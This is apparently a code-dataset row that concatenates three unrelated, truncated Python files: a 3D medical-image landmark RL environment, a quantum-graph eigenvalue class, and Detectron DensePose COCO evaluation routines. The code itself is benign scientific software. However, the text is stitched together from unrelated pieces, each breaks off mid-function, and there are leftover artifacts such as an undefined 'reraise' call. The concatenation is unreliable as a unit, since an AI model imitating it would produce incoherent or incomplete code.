input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: medical.py
# Author: <NAME> <<EMAIL>>
import csv
import itertools
def warn(*args, **kwargs):
pass
import warnings
warnings.warn = warn
warnings.simplefilter("ignore", category=PendingDeprecationWarning)
import os
import sys
import six
import random
import threading
import numpy as np
from tensorpack import logger
from collections import Counter, defaultdict, deque, namedtuple
import cv2
import math
import time
from PIL import Image
import subprocess
import shutil
import gym
from gym import spaces
try:
import pyglet
except ImportError as e:
reraise(suffix="HINT: you can install pyglet directly via 'pip install pyglet'.")
from tensorpack.utils.utils import get_rng
from tensorpack.utils.stats import StatCounter
from IPython.core.debugger import set_trace
from dataReader import *
_ALE_LOCK = threading.Lock()
Rectangle = namedtuple("Rectangle", ["xmin", "xmax", "ymin", "ymax", "zmin", "zmax"])
# ===================================================================
# =================== 3d medical environment ========================
# ===================================================================
class MedicalPlayer(gym.Env):
"""Class that provides 3D medical image environment.
This is just an implementation of the classic "agent-environment loop".
Each time-step, the agent chooses an action, and the environment returns
an observation and a reward."""
def __init__(
    self,
    directory=None,
    viz=False,
    task=False,
    files_list=None,
    screen_dims=(27, 27, 27),
    history_length=20,
    multiscale=True,
    max_num_frames=0,
    saveGif=False,
    saveVideo=False,
    fiducial=0,
    infDir="../inference",
):
    """3D medical-image landmark environment.

    :param directory: environment or game name (unused in this constructor)
    :param viz: visualization
        set to 0 to disable
        set to +ve number to be the delay between frames to show
        set to a string to be the directory for storing frames
    :param task: one of 'train' / 'eval' / 'play' — selects the data
        loader configuration below; anything else behaves like 'train'
    :param files_list: input files handed to the data loader
    :param screen_dims: shape of the frame cropped from the image to feed
        it to dqn (d,w,h) - defaults (27,27,27)
    :param history_length: number of past locations / q-value vectors kept
        to detect oscillations
    :param multiscale: start the agent at a coarse sampling stride and refine
    :param max_num_frames: maximum number of frames (steps) per episode
    :param saveGif: save episode rendering as an animated gif
    :param saveVideo: save episode rendering as a video
    :param fiducial: index of the target landmark passed to the loader
    :param infDir: output directory used in inference ('play') mode
    """
    # (Removed here: a large commented-out experiment block that evaluated
    #  from 19 fixed fractional start points and logged distances to a CSV
    #  file — see version control history if it needs to be revived.)
    super(MedicalPlayer, self).__init__()
    # inits stat counters
    self.reset_stat()
    # counter to limit number of steps per episodes
    self.cnt = 0
    # maximum number of frames (steps) per episodes
    self.max_num_frames = max_num_frames
    # stores information: terminal, score, distError
    self.info = None
    # option to save display as gif
    self.saveGif = saveGif
    self.saveVideo = saveVideo
    # training flag
    self.task = task
    # image dimension (2D/3D)
    self.screen_dims = screen_dims
    self.dims = len(self.screen_dims)
    # multi-scale agent
    self.multiscale = multiscale
    # init env dimensions
    if self.dims == 2:
        self.width, self.height = screen_dims
    else:
        self.width, self.height, self.depth = screen_dims
    # RNG creation is serialized — mirrors ALE usage where construction is
    # not thread-safe.
    with _ALE_LOCK:
        self.rng = get_rng(self)
    # visualization setup
    if isinstance(viz, six.string_types):  # check if viz is a string
        # a string means "directory to store frames in"; it must exist
        assert os.path.isdir(viz), viz
        viz = 0
    if isinstance(viz, int):
        viz = float(viz)
    self.viz = viz
    if self.viz and isinstance(self.viz, float):
        self.viewer = None
        self.gif_buffer = []
    # stat counter to store current score or accumlated reward
    self.current_episode_score = StatCounter()
    # get action space and minimal action set
    self.action_space = spaces.Discrete(6)  # change number actions here
    self.actions = self.action_space.n
    self.observation_space = spaces.Box(
        low=0, high=255, shape=self.screen_dims, dtype=np.uint8
    )
    # history buffer for storing last locations to check oscilations
    self._history_length = history_length
    self._loc_history = [(0,) * self.dims] * self._history_length
    self._qvalues_history = [(0,) * self.actions] * self._history_length
    # initialize rectangle limits from input image coordinates
    self.rectangle = Rectangle(0, 0, 0, 0, 0, 0)
    # add your data loader here
    # 'play' -> no ground-truth landmarks; 'eval' -> landmarks + eval mode;
    # otherwise (training) -> landmarks, eval disabled.
    if self.task == "play":
        self.files = filesListBrainMRLandmark(
            files_list, returnLandmarks=False, fiducial=fiducial, infDir=infDir,
            eval=True,
        )
    else:
        if self.task == "eval":
            self.files = filesListBrainMRLandmark(
                files_list,
                returnLandmarks=True,
                fiducial=fiducial,
                eval=True,
                infDir=infDir,
            )
        else:
            self.files = filesListBrainMRLandmark(
                files_list,
                returnLandmarks=True,
                fiducial=fiducial,
                eval=False,
                infDir=infDir,
            )
    # prepare file sampler
    self.filepath = None
    self.sampled_files = self.files.sample_circular()
    # reset buffer, terminal, counters, and init new_random_game
    self._restart_episode()
def reset(self):
    """Begin a fresh episode and return its first observation.

    Standard gym entry point: re-initializes all per-episode state and
    hands back the initial cropped frame around the start location.
    """
    # (The original author considered serializing this under _ALE_LOCK;
    #  that guard remains disabled.)
    self._restart_episode()
    return self._current_state()
def _restart_episode(self):
    """Reset per-episode state and sample a new game.

    Clears the terminal flag, reward and step counter, feeds the episode
    counter, resets the score stat, blanks the oscillation-detection
    histories, and finally draws a new image / start point.
    """
    self.terminal = False
    self.reward = 0
    # counter bounding the number of steps in this episode
    self.cnt = 0
    self.num_games.feed(1)
    # reset the accumulated-reward stat counter
    self.current_episode_score.reset()
    blank_loc = (0,) * self.dims
    self._loc_history = [blank_loc] * self._history_length
    # list of q-value tuples, one slot per remembered step
    blank_q = (0,) * self.actions
    self._qvalues_history = [blank_q] * self._history_length
    self.new_random_game()
def new_random_game(self):
    """
    load image,
    set dimensions,
    randomize start point,
    init _screen, qvals,
    calc distance to goal
    """
    self.terminal = False
    self.viewer = None
    # (Removed here: a commented-out experiment block that cycled through
    #  19 fixed fractional start points per image and appended distance
    #  results to a CSV file — see version control history.)
    # # sample a new image
    self._image, self._target_loc, self.filepath, self.spacing = next(
        self.sampled_files
    )
    self.filename = str(self.filepath)
    # multiscale (e.g. start with 3 -> 2 -> 1)
    # scale can be thought of as sampling stride
    if self.multiscale:
        ## brain
        self.action_step = 9
        self.xscale = 3
        self.yscale = 3
        self.zscale = 3
        ## cardiac (alternative tuning, kept for reference)
        # self.action_step = 6
        # self.xscale = 2
        # self.yscale = 2
        # self.zscale = 2
    else:
        self.action_step = 1
        self.xscale = 1
        self.yscale = 1
        self.zscale = 1
    # image volume size
    self._image_dims = self._image.dims
    ## select random starting point
    # add padding to avoid start right on the border of the image;
    # training uses a wider admissible region (1/5 margins) than
    # evaluation/inference (1/4 margins).
    if self.task == "train":
        skip_thickness = (
            (int)(self._image_dims[0] / 5),
            (int)(self._image_dims[1] / 5),
            (int)(self._image_dims[2] / 5),
        )
    else:
        skip_thickness = (
            int(self._image_dims[0] / 4),
            int(self._image_dims[1] / 4),
            int(self._image_dims[2] / 4),
        )
    # uniform random start inside the padded region, per axis
    x = self.rng.randint(
        0 + skip_thickness[0], self._image_dims[0] - skip_thickness[0]
    )
    y = self.rng.randint(
        0 + skip_thickness[1], self._image_dims[1] - skip_thickness[1]
    )
    z = self.rng.randint(
        0 + skip_thickness[2], self._image_dims[2] - skip_thickness[2]
    )
    self._location = (x, y, z)
    self._start_location = (x, y, z)
    self._qvalues = [0] * self.actions
    self._screen = self._current_state()
    # in 'play' mode there is no ground-truth landmark, so the distance
    # to target is undefined and pinned to 0
    if self.task == "play":
        self.cur_dist = 0
    else:
        self.cur_dist = self.calcDistance(
            self._location, self._target_loc, self.spacing
        )
def calcDistance(self, points1, points2, spacing=(1, 1, 1)):
    """Return the Euclidean distance in mm between two voxel locations.

    Each coordinate is scaled by the per-axis voxel spacing before the
    norm is taken, converting voxel indices to millimetres.
    """
    scale = np.array(spacing)
    a = scale * np.array(points1)
    b = scale * np.array(points2)
    return np.linalg.norm(a - b)
def step(self, act, qvalues):
"""The environment's step function returns exactly what we need.
Args:
act:
Returns:
observation (object):
an environment-specific object representing your observation of
the environment. For example, pixel data from a camera, joint angles
and joint velocities of a robot, or the board state in a board game.
reward (float):
amount of reward achieved by the previous action. The scale varies
between environments, but the goal is always to increase your total
reward.
done (boolean):
whether it's time to reset the environment again. Most (but not all)
tasks are divided up into well-defined episodes, and done being True
indicates the episode has terminated. (For example, perhaps the pole
tipped too far, or you lost your last life.)
info (dict):
diagnostic information useful for debugging. It can sometimes be
useful for learning (for example, it might contain the raw
probabilities behind the environment's last state change). However,
official evaluations of your agent are not allowed to use this for
learning.
"""
self._qvalues = qvalues
current_loc = self._location
self.terminal = False
go_out = False
# UP Z+ -----------------------------------------------------------
if act == 0:
next_location = (
current_loc[0],
current_loc[1],
round(current_loc[2] + self.action_step),
)
if next_location[2] >= self._image_dims[2]:
# print(' trying to go out the image Z+ ',)
next_location = current_loc
go_out = True
# FORWARD Y+ ---------------------------------------------------------
if act == 1:
next_location = (
current_loc[0],
round(current_loc[1] + self.action_step),
current_loc[2],
)
if next_location[1] >= self._image_dims[1]:
# print(' trying to go out the image Y+ ',)
next_location = current_loc
go_out = True
# RIGHT X+ | |
<reponame>hadassa2807/QuantumGraphs
"""
This file presents the quantum graph class.
"""
# Needed libraries:
import inspect
import os
import sys
import importlib
import numpy as np
import math
import cmath
import matplotlib.pyplot as plt
from mpl_toolkits import mplot3d
from mpl_toolkits.mplot3d import Axes3D
from random import randint
"""
This class represents the Infinite loop exception (we raise if the eigenvalues finder function enters an infinite loop)
"""
class InfiniteLoop(Exception):
    """Raised when the eigenvalue finder fails to terminate."""
"""
The quantum graph class
"""
class QuantumGraph:
"""
The constructor aims to initialize every characteristics of the quantum graph: the number of nodes, the adjacency matrix,
the number of edges from each vertex array, the matrix of the graph's characteristics, the S matrix, the minimal length from the
array of length, and the eigenvalues of the graph. We can also initialize a specific number of eigenvalues we want to compute and
an array of vertices with Dirichlet conditions.
"""
def __init__(self, Nb_nodes, A, coord_list, Num_eigenval=None, DVertices=None, min=None, max=None):
    """Initialize every characteristic of the quantum graph.

    :param Nb_nodes: number of vertices.
    :param A: adjacency matrix (2D array-like, positive entry == edge).
    :param coord_list: per-vertex (x, y) coordinates used for edge lengths.
    :param Num_eigenval: if given, compute exactly this many eigenvalues.
    :param DVertices: optional 0/1 array marking Dirichlet vertices;
        defaults to all-Neumann (zeros).
    :param min: lower bound of the eigenvalue search interval (default 0).
    :param max: upper bound of the search interval (default pi / minL).
    """
    self.NbNodes = Nb_nodes
    self.adj_mat = A
    self.vertices = coord_list
    self.num_eigval = Num_eigenval
    # Fix: use `is None` instead of `== None`. An `==` comparison against
    # an array-like DVertices is evaluated elementwise by numpy and would
    # raise "truth value of an array is ambiguous".
    if DVertices is None:
        self.DCondition = np.zeros(Nb_nodes, dtype=int)
    else:
        self.DCondition = DVertices
    self.Nb_edges = self.NbOutingEdges()
    # last slot of Nb_edges holds the total (undirected) edge count
    self.TotEdges = self.Nb_edges[Nb_nodes]
    self.transfer_mat = self.TM_simple()
    self.graph_characteristics = self.def_of_edges()
    self.SMatrix = self.S_mat(self.DCondition)
    self.minL = self.min_L()
    # search interval for eigenvalues; endP defaults to pi / (minimal length)
    if min is None:
        self.startP = 0
    else:
        self.startP = min
    if max is None:
        self.endP = np.pi / self.minL
    else:
        self.endP = max
    if Num_eigenval is not None:
        self.EigenVal = self.k_eigenval_finder(Num_eigenval)
    else:
        self.EigenVal = self.Eigenvals_finder()
# Aims to convert a 2D array into a matrix
def load(self,table):
if len(table) != self.NbNodes or len(table[0]) != self.NbNodes:
return ("error : Bad dimensions")
for i in range(self.NbNodes):
for j in range(self.NbNodes):
self.adj_mat[i][j]=table[i][j]
# Gets an item from the matrix
def __getitem__(self,index):
return self.adj_mat[index]
# Sets a new value at place index into the matrix
def __setitem__(self,index,value):
self.adj_mat[index]=value
# Represents the matrix in rows and columns
def __repr__(self):
repres=""
for i in range(self.NbNodes):
repres=repres+str(self.adj_mat[i])
if i != self.NbNodes-1:
repres=repres+"\n"
return repres
"""
The following method aims to create an array which contains, at each position <vertex>,
the number of edges which are going out from the vertex.
"""
def NbOutingEdges(self):
    """Return a list with the out-degree of each vertex, plus the total
    number of undirected edges appended as the final element.

    NOTE(review): the source this was recovered from had its indentation
    stripped; the placement of `y = y + x` at the per-vertex level (so that
    y accumulates the degree sum, and y/2 is the edge count by the
    handshake lemma) is the reconstruction consistent with how the last
    element is used as `TotEdges` — confirm against the original file.
    """
    x = 0
    y = 0
    a = []
    # We count the number of edges (i,j) going out from each vertex (if the value of the adjacency matrix is positive at (i,j))
    for i in range(0, self.NbNodes):
        for j in range(0, self.NbNodes):
            if self.adj_mat[i][j] > 0:
                x = x + 1
        # y accumulates the sum of degrees seen so far
        y = y + x
        a.append(x)
        x = 0
    # We add the total number of edges in the graph at the end of the array.
    # NOTE(review): y/2 is a float under Python 3 true division; callers
    # cast it with int(...) before use.
    a.append(y/2)
    return a
"""
The transfer matrix;
The member(i,j) represents the numero of the edge between the node i and the node j;
If i and j are not connected, the value of the matrix at (i,j) is zero;
The diagonal of the matrix is filled with zeros.
The edges are entered in a "lexicographic" order according to the vertices' array given
"""
def TM_simple(self):
counter = 1
TM = np.zeros( (self.NbNodes, self.NbNodes) )
for i in range(0, self.NbNodes):
for j in range(i, self.NbNodes):
if (self.adj_mat[i][j] > 0):
TM[i][j] = int(counter)
TM[j][i] = TM[i][j]
counter+=1
else:
TM[i][j] = 0
TM[j][i] = TM[i][j]
return TM
"""
The calculation of edges' lengths with given coordinates
"""
def lengths_calc(self, x0, y0, x1, y1):
    """Euclidean length of the segment from (x0, y0) to (x1, y1)."""
    dx = x1 - x0
    dy = y1 - y0
    return np.sqrt((dy ** 2) + (dx ** 2))
"""
The following method aims to create the matrix of characteristics of the edges of the graph, while:
The first row of the matrix represents the starting vertex of the edge numero column+1;
The second row of the matrix represents the ending vertex of the edge numero column+1;
The third row of the matrix represents the length of the edge numero column+1;
For each i even, the i-th column represents the charactersitic of an edge and the column i+1 the invert of this edge
"""
def def_of_edges(self):
    """Build the 3 x 2E matrix of directed-edge characteristics.

    Row 0: starting vertex of directed edge (column index).
    Row 1: ending vertex of directed edge (column index).
    Row 2: Euclidean length of the edge.
    For each even column ind, column ind+1 describes the reversed edge,
    so each undirected edge occupies a consecutive pair of columns whose
    position is derived from its id in the transfer matrix.
    """
    Nb_tot = int(self.TotEdges)
    GraphDetails = np.zeros( (3, 2*Nb_tot) )
    for i in range(0, self.NbNodes):
        for j in range(i, self.NbNodes):
            if self.transfer_mat[i][j] > 0:
                # edge id k (1-based) maps to column pair (2k-2, 2k-1)
                ind = int(2*(self.transfer_mat[i][j]-1))
                # starting vertex of the edge numero column+1
                GraphDetails[0][ind] = i
                GraphDetails[0][ind+1] = j
                # ending vertex of the edge numero column+1
                GraphDetails[1][ind] = j
                GraphDetails[1][ind+1] = i
                # length of the edge numero column+1 (same for both
                # directions, computed from the vertex coordinates)
                x0 = self.vertices[int(GraphDetails[0][ind])][0]
                y0 = self.vertices[int(GraphDetails[0][ind])][1]
                x1 = self.vertices[int(GraphDetails[1][ind])][0]
                y1 = self.vertices[int(GraphDetails[1][ind])][1]
                GraphDetails[2][ind] = self.lengths_calc(x0, y0, x1, y1)
                GraphDetails[2][ind+1] = GraphDetails[2][ind]
    return GraphDetails
"""
This method returns the minimal length of all the edges of the graph.
"""
def min_L(self):
minLengths = self.graph_characteristics[2][0]
for num in range(1,int(self.Nb_edges[self.NbNodes]-1)):
if self.graph_characteristics[2][num]<minLengths:
minLengths = self.graph_characteristics[2][num]
return minLengths
"""
The S matrix of the quantum graph;
"""
def S_mat(self, dv):
    """Build the 2E x 2E bond-scattering matrix S of the quantum graph.

    :param dv: per-vertex 0/1 flags; 1 marks a Dirichlet vertex.

    Entry (i, j) couples directed edge i into directed edge j at their
    shared vertex: back-scattering (j is the reverse of i) gets 2/d - 1
    (or -1 at a Dirichlet vertex), plain transmission gets 2/d (or 0 at a
    Dirichlet vertex), where d is the degree of the shared vertex.
    NOTE(review): "reverse" is detected by comparing endpoint vertices
    only, which presumes no parallel edges — confirm for multigraphs.
    """
    Nb_tot = int(self.Nb_edges[self.NbNodes])
    # Initialize the matrix to be of dimension which is number of (directed) edges
    S = np.zeros( (2*Nb_tot, 2*Nb_tot) )
    for i in range(0, 2*Nb_tot):
        for j in range(0, 2*Nb_tot):
            # If both edges i and j are the inverse of each other then we set the value of the S matrix at (i,j) to 2/dv-1
            if ((self.graph_characteristics[1][i] == self.graph_characteristics[0][j]) and (self.graph_characteristics[0][i] == self.graph_characteristics[1][j])):
                # Dirichlet condition -> we set the value of the S matrix at (i,j) to -1
                if (dv[int(self.graph_characteristics[0][j])] == 1):
                    S[i][j] = -1
                else:
                    S[i][j] = (2/self.Nb_edges[int(self.graph_characteristics[1][i])]) - 1
            # Otherwise, if the edges are adjacent, then we set the value of the S matrix at (i,j) to 2/dv
            elif self.graph_characteristics[1][i] == self.graph_characteristics[0][j]:
                if (dv[int(self.graph_characteristics[0][j])] == 0):
                    S[i][j] = 2/self.Nb_edges[int(self.graph_characteristics[1][i])]
                # Dirichlet condition -> we set the value of the S matrix at (i,j) to 0
                else:
                    S[i][j] = 0
    return S
"""
In the following method, secular_det, we calculate the secular determinant.
We start by finding the complex determinant complex_det and, as seen in
formula (63), we derive the real function R_sec_det, which has the same
zeros k as complex_det; these zeros are the sought eigenvalues.
"""
def secular_det(self, k):
    """Evaluate the (real-valued) secular determinant at wavenumber k.

    Builds the diagonal phase matrix D(k) = diag(exp(i * L_e * k)) over
    the 2E directed edges, takes det(I - S D(k)), then rescales by
    exp(-i * k * sum(L)) / sqrt(det S) so the result is real up to
    rounding (formula (63) of the reference the file cites); its zeros
    are the graph eigenvalues.
    """
    Nb_tot = int(self.Nb_edges[self.NbNodes])
    # Creation of the matrix D(k): diagonal of per-edge phases
    D = np.zeros( (2*Nb_tot, 2*Nb_tot), dtype=complex )
    for row in range(0, 2*Nb_tot):
        for col in range(0, 2*Nb_tot):
            if (row == col):
                D[row][col] = cmath.exp(1j*self.graph_characteristics[2][row]*k)
    # Calculation of the secular determinant of I - S*D(k)
    I = np.identity(2*Nb_tot)
    A = I - np.matmul(self.SMatrix, D)
    complex_det = np.linalg.det(A)
    # Calculation of the real part of the secular determinant;
    # sqrt(det S) is imaginary when det S < 0
    S_det = np.linalg.det(self.SMatrix)
    if (S_det < 0):
        S_det_sqrt = math.sqrt(abs(S_det))*1j
    else:
        S_det_sqrt = math.sqrt(abs(S_det))
    # total metric length: sum one length per undirected edge
    # (even columns only, since lengths are duplicated per direction)
    Sum_L = 0
    for num in range(0, 2*Nb_tot, 2):
        Sum_L += self.graph_characteristics[2][num]
    R_sec_det = (cmath.exp(-1j*Sum_L*k)/S_det_sqrt)*complex_det
    return R_sec_det
"""
The following method gets an interval (a,b) at which we want to search, and a number of iterations (N) to control
the ratio precision (running time of the research) and returns the value between the numbers a and b where the secular_det method
crosses a zero (if there is such a value)
"""
def bisection(self,a,b,N):
# Failure control of the algorithm.
if self.secular_det(a)*self.secular_det(b) >= 0:
print("Bisection method fails.")
print("reason of failure : ", self.secular_det(a), self.secular_det(b))
return None
# We set the starting point (a_n) and end point (b_n) of the interval
a_n = a
b_n = b
# Now we go over many samples of the function to look for zeros
for n in range(1,N+1):
# We set a middle point m_n (to be updated at each step of the loop)
m_n = (a_n + b_n)/2
f_m_n = self.secular_det(m_n)
# We check if m_n is correspunding to a zero (with a precision of 10^-6) and return it in that case.
if abs(f_m_n) <= 10**-6 :
return m_n
# We check if m_n is at the right side of the wanted zero;
# if so, the interval we look into is now (m_n, b_n).
elif self.secular_det(b_n)*f_m_n < 0:
a_n = m_n
b_n = b_n
# We check if m_n is at the left side of the wanted zero;
# if so, the interval we look into is now (a_n, m_n).
elif self.secular_det(a_n)*f_m_n < 0:
a_n = a_n
b_n = m_n
# Should not reach that point (failure of the method).
else:
"""print("Bisection method fails.")"""
return None
# In case of failure after | |
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
##############################################################################
"""Functions for evaluating results computed for a json dataset."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import json
import logging
import numpy as np
import os
import uuid
import pickle
#from pycocotools.cocoeval import COCOeval
from detectron.datasets.densepose_cocoeval import denseposeCOCOeval
from detectron.core.config import cfg
from detectron.utils.io import save_object
import detectron.utils.boxes as box_utils
logger = logging.getLogger(__name__)
def evaluate_masks(
    json_dataset,
    all_boxes,
    all_segms,
    output_dir,
    use_salt=True,
    cleanup=False
):
    """Dump segmentation detections to a COCO-format JSON file and, for
    non-test splits, score them with the DensePose mask evaluator.

    Returns the COCOeval object, or None on test splits (whose
    annotations are withheld). When *cleanup* is set, the intermediate
    results file is deleted afterwards.
    """
    base = 'segmentations_' + json_dataset.name + '_results'
    if use_salt:
        # salt the filename so concurrent runs do not collide
        base += '_{}'.format(str(uuid.uuid4()))
    res_file = os.path.join(output_dir, base) + '.json'
    _write_coco_segms_results_file(
        json_dataset, all_boxes, all_segms, res_file)
    # Only do evaluation on non-test sets (annotations are undisclosed on test)
    coco_eval = None
    if json_dataset.name.find('test') == -1:
        coco_eval = _do_segmentation_eval(json_dataset, res_file, output_dir)
    # Optionally cleanup results json file
    if cleanup:
        os.remove(res_file)
    return coco_eval
def _write_coco_segms_results_file(
    json_dataset, all_boxes, all_segms, res_file
):
    """Serialize per-category segmentation results into one JSON file.

    Output entries have the COCO results shape:
    {"image_id": ..., "category_id": ..., "segmentation": ..., "score": ...}
    """
    results = []
    for cls_ind, cls in enumerate(json_dataset.classes):
        # stop once we run past the detections actually provided
        if cls_ind >= len(all_boxes):
            break
        if cls == '__background__':
            continue
        cat_id = json_dataset.category_to_id_map[cls]
        per_cls = _coco_segms_results_one_category(
            json_dataset, all_boxes[cls_ind], all_segms[cls_ind], cat_id)
        results.extend(per_cls)
    logger.info(
        'Writing segmentation results json to: {}'.format(
            os.path.abspath(res_file)))
    with open(res_file, 'w') as fid:
        json.dump(results, fid)
def _coco_segms_results_one_category(json_dataset, boxes, segms, cat_id):
results = []
image_ids = json_dataset.COCO.getImgIds()
image_ids.sort()
assert len(boxes) == len(image_ids)
assert len(segms) == len(image_ids)
for i, image_id in enumerate(image_ids):
dets = boxes[i]
rles = segms[i]
if isinstance(dets, list) and len(dets) == 0:
continue
dets = dets.astype(np.float)
scores = dets[:, -1]
results.extend(
[{'image_id': image_id,
'category_id': cat_id,
'segmentation': rles[k],
'score': scores[k]}
for k in range(dets.shape[0])])
return results
def _do_segmentation_eval(json_dataset, res_file, output_dir):
    """Run the DensePose COCO mask evaluator over *res_file*, log the
    metrics, and pickle the COCOeval object into *output_dir*."""
    coco_dt = json_dataset.COCO.loadRes(str(res_file))
    evaluator = denseposeCOCOeval(json_dataset.COCO, coco_dt, 'segm')
    evaluator.evaluate()
    evaluator.accumulate()
    _log_detection_eval_metrics(json_dataset, evaluator)
    out_path = os.path.join(output_dir, 'segmentation_results.pkl')
    save_object(evaluator, out_path)
    logger.info('Wrote json eval results to: {}'.format(out_path))
    return evaluator
def evaluate_boxes(
    json_dataset, all_boxes, output_dir, use_salt=True, cleanup=False
):
    """Dump bbox detections to a COCO-format JSON file and, for non-test
    splits, score them with the DensePose bbox evaluator.

    Returns the COCOeval object, or None on test splits. When *cleanup*
    is set, the intermediate results file is deleted afterwards.
    """
    base = 'bbox_' + json_dataset.name + '_results'
    if use_salt:
        # salt the filename so concurrent runs do not collide
        base += '_{}'.format(str(uuid.uuid4()))
    res_file = os.path.join(output_dir, base) + '.json'
    _write_coco_bbox_results_file(json_dataset, all_boxes, res_file)
    # Only do evaluation on non-test sets (annotations are undisclosed on test)
    coco_eval = None
    if json_dataset.name.find('test') == -1:
        coco_eval = _do_detection_eval(json_dataset, res_file, output_dir)
    # Optionally cleanup results json file
    if cleanup:
        os.remove(res_file)
    return coco_eval
def _write_coco_bbox_results_file(json_dataset, all_boxes, res_file):
    """Serialize per-category bbox detections into one JSON file.

    Output entries have the COCO results shape:
    {"image_id": 42, "category_id": 18,
     "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}
    """
    results = []
    for cls_ind, cls in enumerate(json_dataset.classes):
        # stop once we run past the detections actually provided
        if cls_ind >= len(all_boxes):
            break
        if cls == '__background__':
            continue
        cat_id = json_dataset.category_to_id_map[cls]
        per_cls = _coco_bbox_results_one_category(
            json_dataset, all_boxes[cls_ind], cat_id)
        results.extend(per_cls)
    logger.info(
        'Writing bbox results json to: {}'.format(os.path.abspath(res_file)))
    with open(res_file, 'w') as fid:
        json.dump(results, fid)
def _coco_bbox_results_one_category(json_dataset, boxes, cat_id):
    """Convert one category's detections into COCO bbox results.

    Boxes arrive as xyxy with a trailing score column and are converted
    to COCO's xywh convention before serialization.

    :param json_dataset: dataset wrapper exposing ``COCO.getImgIds()``.
    :param boxes: per-image arrays of detections, last column = score.
    :param cat_id: COCO category id to stamp on every result.
    :return: list of result dicts, one per detection.
    """
    results = []
    image_ids = json_dataset.COCO.getImgIds()
    image_ids.sort()
    assert len(boxes) == len(image_ids)
    for i, image_id in enumerate(image_ids):
        dets = boxes[i]
        if isinstance(dets, list) and len(dets) == 0:
            continue
        # Fix: np.float was a deprecated alias of builtin float and was
        # removed in NumPy 1.24; astype(float) is the exact equivalent.
        dets = dets.astype(float)
        scores = dets[:, -1]
        xywh_dets = box_utils.xyxy_to_xywh(dets[:, 0:4])
        xs = xywh_dets[:, 0]
        ys = xywh_dets[:, 1]
        ws = xywh_dets[:, 2]
        hs = xywh_dets[:, 3]
        results.extend(
            [{'image_id': image_id,
              'category_id': cat_id,
              'bbox': [xs[k], ys[k], ws[k], hs[k]],
              'score': scores[k]} for k in range(dets.shape[0])])
    return results
def _do_detection_eval(json_dataset, res_file, output_dir):
    """Run the DensePose COCO bbox evaluator over *res_file*, log the
    metrics, and pickle the COCOeval object into *output_dir*."""
    coco_dt = json_dataset.COCO.loadRes(str(res_file))
    evaluator = denseposeCOCOeval(json_dataset.COCO, coco_dt, 'bbox')
    evaluator.evaluate()
    evaluator.accumulate()
    _log_detection_eval_metrics(json_dataset, evaluator)
    out_path = os.path.join(output_dir, 'detection_results.pkl')
    save_object(evaluator, out_path)
    logger.info('Wrote json eval results to: {}'.format(out_path))
    return evaluator
def _log_detection_eval_metrics(json_dataset, coco_eval):
    """Log mean and per-category AP over IoU in [0.5, 0.95], then the
    standard COCO summary table, from an already-accumulated COCOeval."""
    def _get_thr_ind(coco_eval, thr):
        # locate the index of IoU threshold `thr` in the evaluator's
        # threshold grid (tolerance 1e-5 against float drift)
        ind = np.where((coco_eval.params.iouThrs > thr - 1e-5) &
                       (coco_eval.params.iouThrs < thr + 1e-5))[0][0]
        iou_thr = coco_eval.params.iouThrs[ind]
        assert np.isclose(iou_thr, thr)
        return ind
    IoU_lo_thresh = 0.5
    IoU_hi_thresh = 0.95
    ind_lo = _get_thr_ind(coco_eval, IoU_lo_thresh)
    ind_hi = _get_thr_ind(coco_eval, IoU_hi_thresh)
    # precision has dims (iou, recall, cls, area range, max dets)
    # area range index 0: all area ranges
    # max dets index 2: 100 per image
    precision = coco_eval.eval['precision'][ind_lo:(ind_hi + 1), :, :, 0, 2]
    # -1 marks absent precision entries; exclude them from the mean
    ap_default = np.mean(precision[precision > -1])
    logger.info(
        '~~~~ Mean and per-category AP @ IoU=[{:.2f},{:.2f}] ~~~~'.format(
            IoU_lo_thresh, IoU_hi_thresh))
    logger.info('{:.1f}'.format(100 * ap_default))
    for cls_ind, cls in enumerate(json_dataset.classes):
        if cls == '__background__':
            continue
        # minus 1 because of __background__
        precision = coco_eval.eval['precision'][
            ind_lo:(ind_hi + 1), :, cls_ind - 1, 0, 2]
        ap = np.mean(precision[precision > -1])
        logger.info('{:.1f}'.format(100 * ap))
    logger.info('~~~~ Summary metrics ~~~~')
    coco_eval.summarize()
def evaluate_box_proposals(
    json_dataset, roidb, thresholds=None, area='all', limit=None
):
    """Evaluate detection proposal recall metrics. This function is a much
    faster alternative to the official COCO API recall evaluation code. However,
    it produces slightly different results.

    :param json_dataset: dataset wrapper (unused beyond signature parity).
    :param roidb: list of image entries with 'boxes', 'gt_classes',
        'is_crowd' and 'seg_areas' fields.
    :param thresholds: IoU thresholds to compute recall at; defaults to
        0.5:0.05:0.95.
    :param area: which gt-box area bucket to evaluate (key of `areas`).
    :param limit: optional cap on the number of proposals per image.
    :return: dict with average recall 'ar', per-threshold 'recalls',
        'thresholds', raw 'gt_overlaps' and gt count 'num_pos'.
    """
    # Record max overlap value for each gt box
    # Return vector of overlap values
    areas = {
        'all': 0,
        'small': 1,
        'medium': 2,
        'large': 3,
        '96-128': 4,
        '128-256': 5,
        '256-512': 6,
        '512-inf': 7}
    area_ranges = [
        [0**2, 1e5**2],    # all
        [0**2, 32**2],     # small
        [32**2, 96**2],    # medium
        [96**2, 1e5**2],   # large
        [96**2, 128**2],   # 96-128
        [128**2, 256**2],  # 128-256
        [256**2, 512**2],  # 256-512
        [512**2, 1e5**2]]  # 512-inf
    assert area in areas, 'Unknown area range: {}'.format(area)
    area_range = area_ranges[areas[area]]
    gt_overlaps = np.zeros(0)
    num_pos = 0
    for entry in roidb:
        # ground-truth boxes: labelled, non-crowd, inside the area bucket
        gt_inds = np.where(
            (entry['gt_classes'] > 0) & (entry['is_crowd'] == 0))[0]
        gt_boxes = entry['boxes'][gt_inds, :]
        gt_areas = entry['seg_areas'][gt_inds]
        valid_gt_inds = np.where(
            (gt_areas >= area_range[0]) & (gt_areas <= area_range[1]))[0]
        gt_boxes = gt_boxes[valid_gt_inds, :]
        num_pos += len(valid_gt_inds)
        # proposals are the entries with no gt class
        non_gt_inds = np.where(entry['gt_classes'] == 0)[0]
        boxes = entry['boxes'][non_gt_inds, :]
        if boxes.shape[0] == 0:
            continue
        if limit is not None and boxes.shape[0] > limit:
            boxes = boxes[:limit, :]
        overlaps = box_utils.bbox_overlaps(
